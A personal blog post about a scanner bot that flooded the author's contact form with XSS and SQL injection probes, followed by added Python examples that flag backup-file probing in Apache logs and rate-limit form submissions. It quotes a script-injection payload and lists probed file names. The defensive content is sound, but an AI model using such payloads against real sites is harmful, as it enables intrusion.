The day the Robot attacked
On the 4th of September just before noon (two hours before writing this) my BlackBerry received an email, nothing particularly unusual. Just before I got to check it, I got another and another and this kept on going. Great I thought, probably spam emails that slipped through.
Not quite: on my website I have a contact form that emails me when submitted. The messages being sent to me contained various random payloads that appeared to be a collection of XSS and SQL injection attempts. For example “<ScRiPt src=http://xxx.xxx.xxx/xss.js?32796,5990834475></ScRiPt>” and various others trying to insert images, CSS, SQL, JS, Flash, HTML headers and so on.
Fortunately for me they were kind enough to do this on my contact form and send me emails basically saying “Hey, check out what I’m trying to do”. Of course, this was a (fairly dumb) robot trying a brute force attack; however it amused me slightly because I probably wouldn’t have noticed otherwise for a few days (until I happened to look at logs).
The Robot tried a huge number of combinations: 5640 unique requests were made to the server. Its efforts were based on a lot of guesswork around what pages it found; for example, after going to portfolio.php it tried ‘portfolio.php.bak’, ‘portfolio.php.old’ and various others. It also tried various GET and POST combinations on many of the pages and guessed file names like password.txt (I hope nobody actually has a file like that!).
The IP address I received these requests from was 78.158.151.212, so you may wish to add it to your block list. Looking up the IP address says it is based in Cyprus, but that doesn’t really tell me anything helpful.
The attacks only stopped after I blocked the IP; the Apache log showed thousands of entries for the following minutes, showing it didn’t give up quickly. Fortunately for me the attacks failed and the only annoyance was the 466 emails (!) I received. It is quite interesting to be on the receiving end of an attempt, and it highlights exactly how some exploits must be found. So make sure you take security seriously and don’t leave old files lying around like .bak or .old! You might think nobody will find them, but maybe this robot will visit you too.
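The scanner's behaviour described above (walking found pages and appending .bak, .old and similar suffixes, guessing password.txt, hammering the server from a single address) is easy to spot in the Apache access log once you look. The following is an added example, not the author's code, that parses combined-format log lines and flags addresses that either probe for backup copies of files or exceed a request count. The log lines are constructed samples modelled on the probes the post mentions; the timestamps are made up, and the IP is the one reported in the post.

```python
"""Flag scanner-like behaviour in Apache "combined" access logs.

Added example for the post above, not the site's own code. The sample
log lines below are constructed (fake timestamps) and only reuse the
paths and the source IP that the post itself reports.
"""
import re
from collections import defaultdict

# Apache combined log format: ip ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Suffixes that reveal probing for leftover copies of source files.
BACKUP_SUFFIXES = (".bak", ".old", ".orig", ".save", ".swp", "~")
# Guessable secret-file names (the post mentions password.txt).
SECRET_NAMES = {"password.txt", "passwords.txt", ".htpasswd"}


def parse_line(line):
    """Return a dict for one log line, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_backup_probe(path):
    """True if the request path looks like a guess at a backup or secret file."""
    base = path.split("?", 1)[0].rstrip("/")
    name = base.rsplit("/", 1)[-1]
    return name.endswith(BACKUP_SUFFIXES) or name in SECRET_NAMES


def find_scanners(lines, probe_threshold=3, request_threshold=100):
    """Return {ip: stats} for addresses that look like automated scanners.

    An address is reported when it makes at least `probe_threshold` backup
    or secret-file probes, or at least `request_threshold` requests in total.
    """
    stats = defaultdict(lambda: {"requests": 0, "probes": 0, "not_found": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip lines in another format rather than fail
        s = stats[rec["ip"]]
        s["requests"] += 1
        if is_backup_probe(rec["path"]):
            s["probes"] += 1
        if rec["status"] == 404:
            s["not_found"] += 1
    return {
        ip: s for ip, s in stats.items()
        if s["probes"] >= probe_threshold or s["requests"] >= request_threshold
    }


# Constructed sample log: one scanner-like address and one ordinary visitor.
SAMPLE_LOG = """\
78.158.151.212 - - [04/Sep/2008:11:52:01 +0100] "GET /portfolio.php HTTP/1.1" 200 5120
78.158.151.212 - - [04/Sep/2008:11:52:01 +0100] "GET /portfolio.php.bak HTTP/1.1" 404 312
78.158.151.212 - - [04/Sep/2008:11:52:02 +0100] "GET /portfolio.php.old HTTP/1.1" 404 312
78.158.151.212 - - [04/Sep/2008:11:52:02 +0100] "GET /portfolio.php~ HTTP/1.1" 404 312
78.158.151.212 - - [04/Sep/2008:11:52:03 +0100] "GET /password.txt HTTP/1.1" 404 312
78.158.151.212 - - [04/Sep/2008:11:52:03 +0100] "POST /contact.php HTTP/1.1" 200 2048
192.0.2.10 - - [04/Sep/2008:11:53:10 +0100] "GET /portfolio.php HTTP/1.1" 200 5120
192.0.2.10 - - [04/Sep/2008:11:53:40 +0100] "POST /contact.php HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for ip, s in find_scanners(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {s['requests']} requests, {s['probes']} backup/secret probes, "
              f"{s['not_found']} x 404")
```

Run it against a real log with `find_scanners(open("access.log"))`; the 404 count is a useful secondary signal, since a scanner guessing file names collects far more 404s than a human ever does, and the thresholds are deliberately parameters because a busy site needs higher ones than a personal portfolio.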
I had thought about adding a limit to the number of contact form submissions, say five per minute (still far more than anybody needs); however it was something I shrugged off. I guess I should have listened to my original instincts and I’ll just add it in now…
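The five-per-minute limit the author mentions is a sliding window per client address: keep the timestamps of recently accepted submissions, discard those older than the window, and refuse when the window is full. The following is an added example and not the site's own code; it is in Python rather than the PHP the site runs, keeps state in memory (a real deployment would use the database or a cache shared between workers), and takes an injectable clock so the behaviour can be checked without waiting a minute.

```python
"""Per-client sliding-window limit for contact form submissions.

Added example for the post above, not the site's own code. State is held
in memory for illustration; the `clock` argument is injectable so the
window logic can be exercised deterministically.
"""
import time
from collections import defaultdict, deque


class SubmissionLimiter:
    """Allow at most `limit` accepted submissions per key in any `window_seconds`."""

    def __init__(self, limit=5, window_seconds=60, clock=time.monotonic):
        self.limit = limit
        self.window = window_seconds
        self.clock = clock
        self._hits = defaultdict(deque)  # key -> timestamps of accepted submissions

    def allow(self, key):
        """Record an attempt from `key` and return True if it may proceed."""
        now = self.clock()
        q = self._hits[key]
        # Drop timestamps that have aged out of the window.
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False  # window full: do not record the rejected attempt
        q.append(now)
        return True


def handle_contact_submission(limiter, client_ip, send_email):
    """Return the HTTP status the form handler would answer with.

    `send_email` is the site's existing mailer (a hypothetical callable here);
    it is only invoked when the limiter accepts the submission.
    """
    if not limiter.allow(client_ip):
        return 429  # Too Many Requests: nothing is mailed
    send_email()
    return 200


class FakeClock:
    """Manually advanced clock used to test the window without sleeping."""

    def __init__(self):
        self.t = 0.0

    def __call__(self):
        return self.t

    def advance(self, seconds):
        self.t += seconds


def simulate_burst(attempts=12, limit=5, window_seconds=60):
    """Fire `attempts` submissions from one address at once; return (sent, dropped)."""
    clock = FakeClock()
    limiter = SubmissionLimiter(limit, window_seconds, clock)
    sent = []
    statuses = [handle_contact_submission(limiter, "78.158.151.212", lambda: sent.append(1))
                for _ in range(attempts)]
    return len(sent), statuses.count(429)


if __name__ == "__main__":
    print("burst of 466 submissions -> emails sent, submissions dropped:",
          simulate_burst(attempts=466))
```

Only accepted submissions are recorded, so a flood of rejected attempts does not lock a legitimate visitor out indefinitely; the mailer is never called for a rejected request, which is the point of the exercise, since the 466 emails were the cost of not having this check.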
